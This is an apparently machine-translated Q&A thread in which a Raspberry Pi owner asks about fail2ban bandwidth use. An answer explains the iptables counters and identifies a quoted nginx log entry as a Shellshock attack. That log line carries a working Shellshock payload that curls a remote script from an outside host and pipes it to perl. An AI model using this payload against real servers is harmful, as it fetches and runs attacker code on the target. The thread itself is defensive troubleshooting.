연결 시도를 제한하기 위해 iptablesnginx 와 SSH 서버가 설치된 라즈베리 파이가 있습니다 . 문제는 fail2ban이 많은 대역폭을 소비하는 것 같다는 것입니다.fail2banssh
Chain fail2ban-ssh (1 references)
num pkts bytes target prot opt in out source destination
1 933 63565 RETURN all -- * * 0.0.0.0/0 0.0.0.0/0
몇 분 동안만 열려 있는 동안 이미 +- 60kb를 소비하고 있으며 ssh어제 이후로 로그에 잘못된 시도가 없습니다. 지난번에는 바이트 필드가 14G였습니다.
내 질문: Fail2ban은 동일한 양의 대역폭을 사용합니다. 이것이 정상입니까? 문제가 다른 곳에서 발생합니까?
또한 nginx 로그에 다음과 같은 불쾌한 로그가 표시됩니다.
78.142.173.10 - - [21/Oct/2014:09:33:33 +0000] "GET / HTTP/1.0" 200 99 "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl" "() { :; }; curl http://www.ykum.com//bbs/skin/zero_vote/cpan_root | perl"
이것이 문제와 관련이 있을 수 있습니까?
답변1
지금 몇 시지:
1) fail2ban시스템 구성의 논리를 수정하면 실제로 소비하지 않습니다.어느대역폭 그 자체.
2) 몇 분 안에 60KB는 그다지 많은 대역폭이 아닙니다.
3) 보고 있는 60KB의 대역폭은 오류 이벤트와 일치하는 네트워크 트래픽에 사용되었습니다. 귀하는 트래픽 생성자가 아니기 때문에 트래픽을 줄이기 위해 할 수 있는 일은 없습니다. fail2ban규칙의 일부로 거부된다는 사실은 트래픽에 영향을 미칠 수 있음을 나타냅니다.생각하다차단되었습니다.
4) nginx 로그는 원격 공격자가 쉘쇼크 취약점을 이용하려고 시도하고 있음을 나타냅니다. 완전히 패치되었는지 확인하겠습니다.
전체적으로 시스템은 실제로 예상대로 실행되고 있습니다. 이들의 요청을 차단하기 위한 조치를 취하고 싶다면 이들이 수행 중인 VPS를 추적하고 해당 제공자에게 이메일을 보내 해당 네트워크에서 발생하는 남용을 신고할 수 있습니다.
편집하다:
비뚤어진 관심으로 조사한 결과 공격자의 IP는 sonne.publicmanagement.atwhois에 따라 해당 도메인에 대한 연락처 로 확인 [email protected]되었으며 [email protected]직접 이메일을 보낼 수 있습니다. 이 공격이 독일 제공업체에서 제공되었지만 한국 웹사이트로 보이는 곳에서 익스플로잇을 가져왔다는 점을 고려하면 제공업체는 이러한 일이 발생하고 있다는 사실을 합법적으로 몰랐을 가능성이 있으며 이는 자신들이 루팅한 상자 중 하나일 수도 있습니다(아마도 비슷한 패션)